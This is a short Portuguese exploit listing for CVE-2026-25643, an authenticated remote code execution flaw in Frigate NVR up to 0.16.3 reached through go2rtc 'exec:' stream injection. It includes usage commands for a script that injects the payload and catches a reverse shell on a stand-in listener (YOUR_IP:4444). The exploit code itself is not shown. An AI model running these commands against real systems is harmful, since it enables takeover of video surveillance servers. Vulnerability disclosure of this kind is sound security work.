
Exploit para RCE autenticada no Frigate NVR via go2rtc exec: injeção de protocolo, automatizando a execução de comandos do sistema e captura de reverse shell.
Título do Exploit: Frigate NVR <= 0.16.3 - Execução Remota de
Código Autenticada
Data: 2026-02-05
Autor do Exploit: jduardo2704
Homepage do fornecedor: https://frigate.video/
Link do software: https://github.com/blakeblackshear/frigate
Versão: <= 0.16.3
CVE: CVE-2026-25643
Aviso de segurança: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
As versões do Frigate até 0.16.3 são vulneráveis à Execução Remota de
Código (RCE) por meio da configuração go2rtc. Um atacante com acesso
autenticado (ou não autenticado, se a instância estiver exposta) pode
injetar comandos do sistema na configuração de stream usando o protocolo
exec:. Este exploit automatiza a injeção do payload, reinicia o
serviço e captura o reverse shell.
pip install requests pyyaml
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444
Este script é apenas para fins educacionais e testes de segurança autorizados.